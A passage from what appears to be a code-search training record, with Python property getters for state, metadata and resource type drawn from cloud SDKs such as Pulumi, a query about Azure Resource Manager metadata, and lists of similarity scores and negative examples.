"def state(self):\n if self._key in self._product.get_data_states():\n return self._product.get_data_states()[self._key]\n return \"UNAVAILABLE\"",
"def initial_state(self):\n # Network details elided.\n initial_state = None\n\n return initial_state",
"def get_state(self):\n return self.env.sim.get_state()",
"def state(self):\n return pn_connection_state(self._impl)",
"def state(self):\n return self._attributes['status']",
"def getState(self) :\n return self.state",
"def device_state_attributes(self):\n return self._hass.data[DATA_UPCOMING]",
"def load_state(self):\n return self.state.read()",
"def state(self):\n return self._device.value",
"def resource_state(self) -> str:\n return pulumi.get(self, \"resource_state\")",
"def getState(self):\n return self.state",
"def getState(self):\n return self.state",
"def getState(self):\n return self.state",
"def get_status(self):\n if self.vm.get_cloud_status() != \"ACTIVE\":\n return \"stopped\"\n #wait for the vm to be ready and SSH-able\n self.vm.wait_ready()\n status = self.vm.run_command(\"ctool status\", indent=0, prefix='')\n return status.strip()",
"def state(self):\n return self.__state",
"def state(self):\n return self.__state",
"def state(self):\n return self._product.get_key(self._key)",
"def getState():\n # TODO: this isn't nearly as meaningful as it used to be",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")"
] | [
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7650629",
"0.7297779",
"0.7297779",
"0.7297779",
"0.7297779",
"0.7297779",
"0.71375215",
"0.71375215",
"0.69446456",
"0.69446456",
"0.62829787",
"0.6200415",
"0.60750693",
"0.6069546",
"0.5996828",
"0.5996828",
"0.5996828",
"0.5996828",
"0.5968918",
"0.5968918",
"0.59117794",
"0.5890489",
"0.58898824",
"0.58898824",
"0.58898824",
"0.58421254",
"0.5837042",
"0.5776434",
"0.5730711",
"0.5727036",
"0.5669838",
"0.566613",
"0.56635886",
"0.5660558",
"0.56588566",
"0.5643122",
"0.5604866",
"0.55948174",
"0.5594465",
"0.55888265",
"0.5565366",
"0.5557419",
"0.5543605",
"0.5536889",
"0.5532075",
"0.55131495",
"0.5509596",
"0.55094665",
"0.5503161",
"0.5490002",
"0.54848033",
"0.54538727",
"0.5452888",
"0.5452005",
"0.5452005",
"0.5452005",
"0.54493344",
"0.5443926",
"0.5443926",
"0.54395664",
"0.5436718",
"0.54357076",
"0.54357076"
] | 0.7815268 | 9 |
Azure Resource Manager metadata containing createdBy and modifiedBy information. | def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
return pulumi.get(self, "system_data") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_metadata(self):\n md = self.resource.get_cdmi_user_meta()\n md.update(self.resource.get_acl_metadata())\n return md",
"def created_by(self) -> Optional['outputs.UserInfoResponse']:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> \"str\":\n return self._attrs.get(\"createdBy\")",
"def created_by(self) -> \"str\":\n return self._attrs.get(\"createdBy\")",
"def created_by(self) -> \"str\":\n return self._attrs.get(\"createdBy\")",
"def created_by(self) -> \"str\":\n return self._attrs.get(\"createdBy\")",
"def created_by(self) -> str:\n return pulumi.get(self, \"created_by\")",
"def metadata(self):\r\n return resources.Metadata(self)",
"def metadata(self):\n return self.meta.metadata",
"def _metadata(self):\n meta = super()._metadata\n meta.update({\n \"name\": self.name,\n \"lead_in_time\": self.lead_in_time,\n \"amplification\": self.amplification,\n \"amplifier_clipping\": self.amplifier_clipping,\n \"power_threshold\": self.power_threshold,\n })\n return meta",
"def created_by(self) -> Optional[pulumi.Input['UserInfoArgs']]:\n return pulumi.get(self, \"created_by\")",
"def metadata(self): # -> None:\n ...",
"def get_metadata(self):\n return {}",
"def created_by(self, created_by: \"str\"):\n self._attrs[\"createdBy\"] = created_by",
"def created_by(self, created_by: \"str\"):\n self._attrs[\"createdBy\"] = created_by",
"def created_by(self, created_by: \"str\"):\n self._attrs[\"createdBy\"] = created_by",
"def created_by(self, created_by: \"str\"):\n self._attrs[\"createdBy\"] = created_by",
"def write_metadata_to_resource(self, resource,\n update_creators=False,\n update_contributors=False,\n update_creation_date=False,\n update_modification_date=False,\n update_title=False,\n update_keywords=False):\n if update_creators:\n for c in self.get_creators():\n if isinstance(c, GenericResourceMeta.ResourceCreator):\n # Set creator metadata, from bag metadata, to be used in create or update as needed (see below)\n kwargs = {'order': c.order, 'name': c.name,\n 'organization': c.organization,\n 'email': c.email, 'address': c.address,\n 'phone': c.phone, 'homepage': c.homepage,\n 'researcherID': c.researcherID,\n 'researchGateID': c.researchGateID}\n if c.rel_uri:\n # HydroShare user URIs are stored as relative not absolute URIs\n kwargs['hydroshare_user_id'] = c.id\n else:\n kwargs['hydroshare_user_id'] = None\n\n if self.owner_is_hs_user and c.order == 1:\n # Use metadata from bag for owner if the owner is a HydroShare user\n # (because the metadata were inheritted from the user profile when we\n # called create_resource above)\n\n # Find the owner in the creators metadata\n owner_metadata = resource.metadata.creators.filter(order=1).first()\n if owner_metadata is None:\n msg = \"Unable to find owner metadata for created resource {0}\".format(resource.short_id)\n raise GenericResourceMeta.ResourceMetaException(msg)\n # Update owner's creator metadata entry with what came from the bag metadata\n resource.metadata.update_element('Creator', owner_metadata.id, **kwargs)\n else:\n # For the non-owner creators, just create new metadata elements for them.\n resource.metadata.create_element('creator', **kwargs)\n else:\n msg = \"Creators with type {0} are not supported\"\n msg = msg.format(c.__class__.__name__)\n raise TypeError(msg)\n if update_contributors:\n for c in self.contributors:\n # Add contributors\n if isinstance(c, GenericResourceMeta.ResourceContributor):\n kwargs = {'name': c.name, 'organization': c.organization,\n 'hydroshare_user_id': c.id,\n 'email': c.email, 'address': c.address,\n 'phone': c.phone, 'homepage': c.homepage,\n 'researcherID': c.researcherID,\n 'researchGateID': c.researchGateID}\n resource.metadata.create_element('contributor', **kwargs)\n else:\n msg = \"Contributor with type {0} are not supported\"\n msg = msg.format(c.__class__.__name__)\n raise TypeError(msg)\n if update_title and self.title:\n resource.metadata.update_element('title', resource.metadata.title.id,\n value=self.title)\n if update_keywords and self.keywords:\n # Remove existing keywords\n if resource.metadata.subjects:\n resource.metadata.subjects.all().delete()\n for keyword in self.keywords:\n resource.metadata.create_element('subject', value=keyword)\n if self.abstract:\n if resource.metadata.description:\n resource.metadata.update_element('description', resource.metadata.description.id,\n abstract=clean_for_xml(self.abstract))\n else:\n resource.metadata.create_element('description',\n abstract=clean_for_xml(self.abstract))\n if self.rights:\n resource.metadata.update_element('rights', resource.metadata.rights.id,\n statement=self.rights.statement)\n if self.language:\n resource.metadata.update_element('language', resource.metadata.language.id,\n code=self.language)\n if update_creation_date and self.creation_date:\n res_created_date = resource.metadata.dates.all().filter(type='created')[0]\n res_created_date.start_date = self.creation_date\n res_created_date.save()\n # Update creation date representation provided by Mezzanine\n resource.created = self.creation_date\n resource.save()\n 
if len(self.coverages) > 0:\n resource.metadata.coverages.all().delete()\n for c in self.coverages:\n kwargs = {}\n if isinstance(c, GenericResourceMeta.ResourceCoveragePeriod):\n kwargs['type'] = 'period'\n val = {}\n val['name'] = c.name\n # val['start'] = c.start_date.isoformat()\n # val['end'] = c.end_date.isoformat()\n # Cast temporal coverages to month/day/year format as this is how they are stored as strings\n # in the metadata tables.\n val['start'] = c.start_date.strftime('%m/%d/%Y')\n val['end'] = c.end_date.strftime('%m/%d/%Y')\n val['scheme'] = c.scheme\n kwargs['value'] = val\n resource.metadata.create_element('coverage', **kwargs)\n elif isinstance(c, GenericResourceMeta.ResourceCoveragePoint):\n kwargs['type'] = 'point'\n val = {}\n val['name'] = c.name\n val['east'] = c.east\n val['north'] = c.north\n val['units'] = c.units\n val['elevation'] = c.elevation\n val['zunits'] = c.zunits\n val['projection'] = c.projection\n kwargs['value'] = val\n resource.metadata.create_element('coverage', **kwargs)\n elif isinstance(c, GenericResourceMeta.ResourceCoverageBox):\n kwargs['type'] = 'box'\n val = {}\n val['name'] = c.name\n val['northlimit'] = c.northlimit\n val['eastlimit'] = c.eastlimit\n val['southlimit'] = c.southlimit\n val['westlimit'] = c.westlimit\n val['units'] = c.units\n val['projection'] = c.projection\n val['uplimit'] = c.uplimit\n val['downlimit'] = c.downlimit\n val['zunits'] = c.zunits\n kwargs['value'] = val\n resource.metadata.create_element('coverage', **kwargs)\n else:\n msg = \"Coverages with type {0} are not supported\"\n msg = msg.format(c.__class__.__name__)\n raise TypeError(msg)\n if len(self.relations) > 0:\n resource.metadata.relations.all().delete()\n for r in self.relations:\n if isinstance(r, GenericResourceMeta.ResourceRelation):\n kwargs = {'type': r.relationship_type,\n 'value': r.uri}\n resource.metadata.create_element('relation', **kwargs)\n else:\n msg = \"Relations with type {0} are not supported\"\n msg = msg.format(r.__class__.__name__)\n raise TypeError(msg)\n\n if update_modification_date:\n # Update modification date last\n self.set_resource_modification_date(resource)",
"def created_by(self):\n return self._created_by",
"def created_by(self, is_updated=False):\n if not isinstance(self.json, dict):\n return\n if self.request.method == constants.PUT:\n is_updated = True\n\n created_by = 'system'\n if hasattr(self, 'user'):\n if self.user:\n created_by = self.user.email\n\n elif hasattr(self, 'google_user'):\n if self.google_user:\n created_by = self.google_user.get('email', 'system')\n\n key = 'created_by'\n if is_updated:\n key = 'updated_by'\n logging.info('{} is {}'.format(key, created_by))\n self.json[key] = created_by",
"def metadata(self) -> Mapping[str, str]:\n return pulumi.get(self, \"metadata\")",
"def get_additional_data(self, create):\n additional_data = {}\n if has_fields(self.get_queryset().model, 'created_by', 'modified_by'):\n additional_data['modified_by'] = self.request.user\n\n if create:\n additional_data['created_by'] = self.request.user\n\n return additional_data",
"def metadata(self) -> Mapping[str, str]:\r\n return self._metadata",
"def metadata(self) -> Mapping[str, str]:\r\n return self._metadata",
"def get_metadata(self):\n metadata = {}\n for k in self.metadata_keys:\n metadata[k] = copy.copy(getattr(self, k))\n return metadata",
"def metadata(self) -> dict:\n return self._metadata",
"def _metadata(self) -> Dict[str, Any]:\n return self.__metadata",
"async def metadata(self) -> AccountInformationMetaData:\n\n e = await self.request.request(url=f'https://accountinformation.roblox.com/v1/metadata', method='get')\n return AccountInformationMetaData(item=e)",
"def get_metadata(self):\n # currently there is no metadata to send\n return {}",
"def metadata(self) -> dict:\n\n meta = {}\n meta['name'] = self.name\n meta['potential_key'] = self.potential_key\n meta['potential_id'] = self.potential_id\n meta['potential_LAMMPS_key'] = self.potential_LAMMPS_key\n meta['potential_LAMMPS_id'] = self.potential_LAMMPS_id\n\n for subset in self.subsets:\n subset.metadata(meta)\n\n return meta",
"def created_by(self):\n if \"createdBy\" in self._prop_dict:\n if isinstance(self._prop_dict[\"createdBy\"], OneDriveObjectBase):\n return self._prop_dict[\"createdBy\"]\n else :\n self._prop_dict[\"createdBy\"] = IdentitySet(self._prop_dict[\"createdBy\"])\n return self._prop_dict[\"createdBy\"]\n\n return None",
"def metadata(self) -> dict:\n meta = {}\n meta['filename'] = self.filename\n meta['label'] = self.label\n meta['url'] = self.url\n\n return meta",
"def metadata(self) -> t.Mapping[str, str]:\n return self._metadata",
"def metadata(self):\n metadata = {}\n metadata['successful'] = True\n metadata['time_information'] = {'begin': self.begin.isoformat(),\n 'end': self.end.isoformat(),\n 'elapsed': self.elapsed,\n }\n metadata['user'] = self.user\n metadata['database'] = {'name': settings.DATABASES['default']['NAME'],\n 'host': settings.DATABASES['default']['HOST'],\n }\n metadata['input_arguments'] = self.input_arguments\n center_ids = [center.center_id for center in self.centers]\n metadata['registration_centers_processed'] = sorted(center_ids)\n metadata['total_pdf_file_count'] = self.n_total_files\n metadata['total_pdf_page_count'] = self.n_total_pages\n metadata['total_pdf_byte_count'] = self.n_total_bytes\n metadata['files'] = self.fileinfo\n metadata['offices'] = [model_to_dict(office) for office in self.offices.values()]\n\n return metadata",
"def metadata(self):\n return self._metadata",
"def metadata(self):\n return self._metadata",
"def metadata(self):\n return self._metadata",
"def metadata(self):\n return self._metadata",
"def metadata(self):\n return self._metadata",
"def _getMetadataName(self):\n pass",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def metadata(self) -> dict:\n meta = {}\n meta['name'] = self.name\n meta['id'] = self.id\n meta['family'] = self.family\n \n meta['ptd_type'] = []\n meta['pos'] = []\n meta['atype'] = []\n meta['db_vect'] = []\n meta['scale'] = []\n for cp in self.parameters:\n meta['ptd_type'].append(cp.get('ptd_type', None))\n meta['pos'].append(cp.get('pos', None))\n meta['atype'].append(cp.get('atype', None))\n meta['db_vect'].append(cp.get('db_vect', None))\n meta['scale'].append(cp.get('scale', None))\n \n return meta",
"def metadata(self) -> global___SummaryMetadata:",
"def metadata(self):\r\n return self._metadata",
"def get_metadata(self):\n return self._metadata",
"def metadata(self):\n return copy.deepcopy(self._metadata)",
"def get_metadata(self):\n return self.manager.get_metadata(self)",
"def metadata(self) -> Metadata:\n return self._metadata",
"def metadata(self, metadata):\n return Metadata(metadata)",
"def last_modified_by(self) -> str:\n return pulumi.get(self, \"last_modified_by\")",
"def metadata(self):\n return {\n \"namespace\": self.namespace,\n \"short_name\": f\"{self.namespace}_{self._dataset_metadata['DatasetCode']}\",\n \"name\": f\"{self._dataset_metadata['DatasetName']} - FAO ({self.publication_year})\",\n \"description\": self._dataset_metadata[\"DatasetDescription\"],\n \"source_name\": \"Food and Agriculture Organization of the United Nations\",\n \"publication_year\": int(self.publication_year),\n \"publication_date\": self._dataset_metadata[\"DateUpdate\"],\n \"date_accessed\": str(dt.date.today()),\n \"url\": self.url,\n \"source_data_url\": self.source_data_url,\n \"file_extension\": \"zip\",\n }",
"def __metadata__(self):\n raise NotImplementedError",
"def metadata(self) -> 'outputs.DataCollectionEndpointResponseMetadata':\n return pulumi.get(self, \"metadata\")",
"def created_by(self):\n url = self._data.get('related', {}).get('created_by')\n return self._tower._get_object_by_url('User', url) # pylint: disable=protected-access",
"def get_avatar_metadata(self):\n # Implemented from template for osid.resource.ResourceForm.get_group_metadata_template\n metadata = dict(self._avatar_metadata)\n metadata.update({'existing_avatar_values': self._my_map['avatarId']})\n return Metadata(**metadata)",
"def metadata(self):\n return parse_metadata(self.metadata_path())",
"def GetResourceMetadata(self):\n nodepools = {}\n for name, nodepool in six.iteritems(self.nodepools):\n nodepool_metadata = {\n 'size': nodepool.num_nodes,\n 'machine_type': nodepool.vm_config.machine_type,\n 'name': name,\n }\n if nodepool.sandbox_config is not None:\n nodepool_metadata['sandbox_config'] = {\n 'type': nodepool.sandbox_config.type,\n }\n nodepools[name] = nodepool_metadata\n\n metadata = {\n 'cloud': self.CLOUD,\n 'cluster_type': self.CLUSTER_TYPE,\n 'zone': self.zone,\n 'size': self.num_nodes,\n 'machine_type': self.vm_config.machine_type,\n 'nodepools': nodepools,\n }\n\n if self.min_nodes != self.num_nodes or self.max_nodes != self.num_nodes:\n metadata.update({\n 'max_size': self.max_nodes,\n 'min_size': self.min_nodes,\n })\n\n return metadata",
"def managed_by(self) -> str:\n return pulumi.get(self, \"managed_by\")",
"def metadata(self): # -> list[Unknown]:\n ...",
"def metadata(self): # -> list[Unknown]:\n ...",
"def invocation_metadata(self):\n raise NotImplementedError()",
"def GetResourceMetadata(self):\n result = super().GetResourceMetadata()\n if self.created:\n result['container_cluster_version'] = self.k8s_version\n return result",
"def _get_metadata(self) -> Metadata:\n manifest = self._get_manifest()\n\n return Metadata(**manifest[\"metadata\"])",
"def metadata(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"metadata\")",
"def metadata(self) -> Optional[pulumi.Input['SecurityAssessmentMetadataPropertiesArgs']]:\n return pulumi.get(self, \"metadata\")",
"def get_user_metadata(\n self,\n bucket: str,\n object_name: str\n ) -> typing.Dict[str, str]:\n raise NotImplementedError()",
"def get_metadata(self):\n meta_data = {}\n if self.beam_energy is not None:\n meta_data['beam_energy'] = self.beam_energy\n if self.collection_angle is not None:\n meta_data['collection_angle'] = self.collection_angle\n return meta_data",
"def last_modified_by(self):\n return self._last_modified_by",
"def metadata(self) -> \"ObjectMeta\":\n return typing.cast(\n \"ObjectMeta\",\n self._properties.get(\"metadata\"),\n )",
"def give_metadata(self):\n\n m = dict()\n m['dynamic_expressions'] = self.dynamic_expressions\n\n cust_labels = {}\n for key, value in self.column_labels_custom.iteritems():\n cust_labels[self.raw_to_colname(key)] = value\n m['column_labels_custom'] = cust_labels\n\n m['colsel'] = [self.raw_to_colname(col) for col in self.colsel]\n\n colsizedict = {}\n for col, size in enumerate(self.colsize):\n colsizedict[self.raw_to_colname(col)] = size\n m['colsize'] = colsizedict\n\n marksdict = {}\n for mark, colset in self.marks.iteritems():\n marksdict[mark] = [self.raw_to_colname(col) for col in colset]\n m['marks'] = marksdict\n\n m['name'] = self.name\n return m",
"def author(self):\n\n for item in self.metadata:\n if item.tag.localname == \"creator\":\n if 'file-as' in item.tag:\n return item.tag['file-as']\n else:\n return item.tag.text",
"def _metadata_map():\n return {\n 'date_added': 'dateAdded',\n 'dns_active': 'dnsActive',\n 'last_modified': 'lastModified',\n 'private_flag': 'privateFlag',\n 'whois_active': 'whoisActive',\n 'key_name': 'Key Name',\n 'value_type': 'Value Type',\n 'value_name': 'Value Name',\n 'block': 'Block',\n 'mutex': 'Mutex',\n 'as_number': 'AS Number',\n 'hostname': 'hostName',\n }",
"def get_metadata(self):\n result = defaultdict(str)\n result.update(self.metadata)\n result['file_name'] = self.file_name\n return result",
"def updated_by(self) -> Optional['outputs.UserInfoResponse']:\n return pulumi.get(self, \"updated_by\")",
"def metadata(self):\n return copy.copy(self._metadata)",
"def __init__(__self__, *,\n created_at: str,\n created_by: str,\n created_by_type: str,\n last_modified_at: str,\n last_modified_by: str,\n last_modified_by_type: str):\n pulumi.set(__self__, \"created_at\", created_at)\n pulumi.set(__self__, \"created_by\", created_by)\n pulumi.set(__self__, \"created_by_type\", created_by_type)\n pulumi.set(__self__, \"last_modified_at\", last_modified_at)\n pulumi.set(__self__, \"last_modified_by\", last_modified_by)\n pulumi.set(__self__, \"last_modified_by_type\", last_modified_by_type)",
"def get_metadata():\n\n module = __name__.split('.', 1)\n\n pkg = pkg_resources.get_distribution(module[0])\n meta = {\n 'Name': None,\n 'Version': None,\n 'Summary': None,\n 'Home-page': None,\n 'Author': None,\n 'Author-email': None,\n 'License': None,\n }\n\n for line in pkg.get_metadata_lines(\"PKG-INFO\"):\n for par in meta:\n if line.startswith(par + \":\"):\n _, value = line.split(\": \", 1)\n meta[par] = value\n\n return meta",
"def get_meta(self) -> Meta:\n return Meta(\n object_type=\"profile\",\n extra_custom_props=[\n (\"property\", \"profile.username\", self.user.username),\n (\"property\", \"profile.first_name\", self.user.first_name),\n (\"property\", \"profile.last_name\", self.user.last_name),\n ]\n if self.user\n else [],\n title=self.display_name or self.name,\n image=self.image.large,\n )",
"def created_by(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"created_by\")",
"def metadata(self, timestamp=None):\n\n records = {}\n for k in self.file.root.photons.photontable.attrs._f_list('user'):\n data = getattr(self.file.root.photons.photontable.attrs, k)\n try:\n data = data.get(timestamp, preceeding=True)\n records[k] = data\n except AttributeError:\n records[k] = data\n except ValueError:\n pass # no data\n\n return records",
"def generate_metadata(self):\n self.metadata = {\n 'title': os.path.basename(self.source_file).rsplit('.', 1)[0],\n 'url': self.relative_destination_file,\n 'full_path': os.path.dirname(self.relative_destination_file),\n 'short_path': self.shorten_path(\n os.path.dirname(self.relative_destination_file))\n }",
"def updated_by(self) -> \"str\":\n return self._attrs.get(\"updatedBy\")",
"def updated_by(self) -> \"str\":\n return self._attrs.get(\"updatedBy\")",
"def updated_by(self) -> \"str\":\n return self._attrs.get(\"updatedBy\")",
"def meta_data(self):\r\n return simplejson.dumps(self.__resource_meta)",
"def GetMetadata(self):\n return self.dict['meta']",
"def get_metadata(self):\n return self.client._perform_json(\n \"GET\", \"/projects/%s/recipes/%s/metadata\" % (self.project_key, self.recipe_name))",
"def metadata(self) -> email.message.Message:\n raise NotImplementedError()",
"def metadata(self, tokens):\n\n return self.process_value_pairs(tokens, \"metadata\")",
"def metadata(self) -> pulumi.Output[Optional['outputs.SecurityAssessmentMetadataPropertiesResponse']]:\n return pulumi.get(self, \"metadata\")",
"def metadata(self) -> pulumi.Output[Optional['outputs.SecurityAssessmentMetadataPropertiesResponse']]:\n return pulumi.get(self, \"metadata\")",
"def metadata(self):\n return self._partition_meta_data",
"def metadata(self):\n return self._partition_meta_data",
"def creator(self) -> str:\n return pulumi.get(self, \"creator\")",
"def creator(self) -> str:\n return pulumi.get(self, \"creator\")",
"def metadata(self):\n metadata = dict([(key,{}) for key in self.keys])\n for day in self.days:\n metadata[\"Days\"].append(day.attrs)\n for period in day.period:\n metadata[\"Periods\"].append(period.attrs)\n for course in period.courses:\n metadata[\"Courses\"].append(course.attrs)\n for instructor in course.instructor:\n metadata[\"Instructors\"].append(instructor.attrs)\n return metadata"
] | [
"0.6872594",
"0.63301516",
"0.62992716",
"0.62992716",
"0.62992716",
"0.62992716",
"0.62210387",
"0.62001103",
"0.6097473",
"0.60971665",
"0.6086979",
"0.6079593",
"0.6051205",
"0.60385454",
"0.60385454",
"0.60385454",
"0.60385454",
"0.60265017",
"0.6005793",
"0.6004641",
"0.59962",
"0.59876734",
"0.598701",
"0.598701",
"0.5972229",
"0.59504455",
"0.594829",
"0.5934055",
"0.59145904",
"0.5902085",
"0.5900807",
"0.58718616",
"0.58680093",
"0.58139366",
"0.580804",
"0.580804",
"0.580804",
"0.580804",
"0.580804",
"0.5791525",
"0.57913464",
"0.57913464",
"0.57913464",
"0.57913464",
"0.57913464",
"0.57913464",
"0.57846767",
"0.5779704",
"0.57795197",
"0.577079",
"0.57679504",
"0.5716927",
"0.57153505",
"0.5713494",
"0.56887597",
"0.56798553",
"0.5675552",
"0.5674131",
"0.5669661",
"0.5642266",
"0.5623935",
"0.5617508",
"0.5600007",
"0.55940855",
"0.55940855",
"0.55821085",
"0.5577614",
"0.5553725",
"0.5544866",
"0.5532705",
"0.55232334",
"0.5521143",
"0.5520942",
"0.55204207",
"0.5507454",
"0.5492119",
"0.5488373",
"0.5486684",
"0.54733497",
"0.54713297",
"0.5471094",
"0.54583466",
"0.54507333",
"0.54494715",
"0.54372984",
"0.54367185",
"0.5426261",
"0.5426261",
"0.5426261",
"0.5424847",
"0.54212034",
"0.54153126",
"0.5399376",
"0.5395459",
"0.53902733",
"0.53902733",
"0.5379288",
"0.5379288",
"0.5374333",
"0.5374333",
"0.5347511"
] | 0.0 | -1 |
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts" | def type(self) -> pulumi.Output[str]:
return pulumi.get(self, "type") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def resource_type(self) -> Optional[str]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[str]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(cls):\n pass",
"def request_resource_type(self) -> str:\n return pulumi.get(self, \"request_resource_type\")",
"def get_resource_type(self):\n category = self.get_first_category(DATA_KIND_SCHEME)\n if category is not None:\n return category.label\n else:\n return None",
"def type(self) -> pulumi.Input['ResourceIdentityType']:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:\n return pulumi.get(self, \"type\")",
"def _get_resource_type(self, resource_path):\n remove_query = resource_path.split('?')[0] # remove query parameters\n remove_slashes = remove_query.strip('/') # strip leading and trailing slashes\n return remove_slashes.rstrip('s') # remove trailing 's'",
"def resource_kind(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_kind\")",
"def resource_type(self, resource_type):\n if self.local_vars_configuration.client_side_validation and resource_type is None: # noqa: E501\n raise ValueError(\"Invalid value for `resource_type`, must not be `None`\") # noqa: E501\n allowed_values = [\"Unknown\", \"File\", \"PeopleStageElement\", \"PeopleStageDiagram\", \"PeopleStageSeed\", \"PeopleStageSeedSet\", \"PeopleStageChannel\", \"PeopleStageAggregation\", \"PeopleStageVoucherSet\", \"PeopleStageTemplate\", \"CascadeElement\", \"FastStatsElement\", \"UserElement\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and resource_type not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `resource_type` ({0}), must be one of {1}\" # noqa: E501\n .format(resource_type, allowed_values)\n )\n\n self._resource_type = resource_type",
"def type(self):\n return self.properties.get('type')",
"def type(self):\n\n return self.manifest[\"type\"]",
"def source_resource_type(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"source_resource_type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self):\n return self._getValue('type')",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def res_type(self):\n return self.get(\"res_type\", decode=True)",
"def type(self, mpath):\n try:\n return self.stat(mpath)[\"type\"]\n except errors.MantaResourceNotFoundError:\n return None\n except errors.MantaAPIError:\n _, ex, _ = sys.exc_info()\n if ex.code in ('ResourceNotFound', 'DirectoryDoesNotExist'):\n return None\n else:\n raise",
"def type(self):\n return self.container['type']",
"def type(self):\n return self.container['type']",
"def get_type(self) -> str:\n return self.type",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
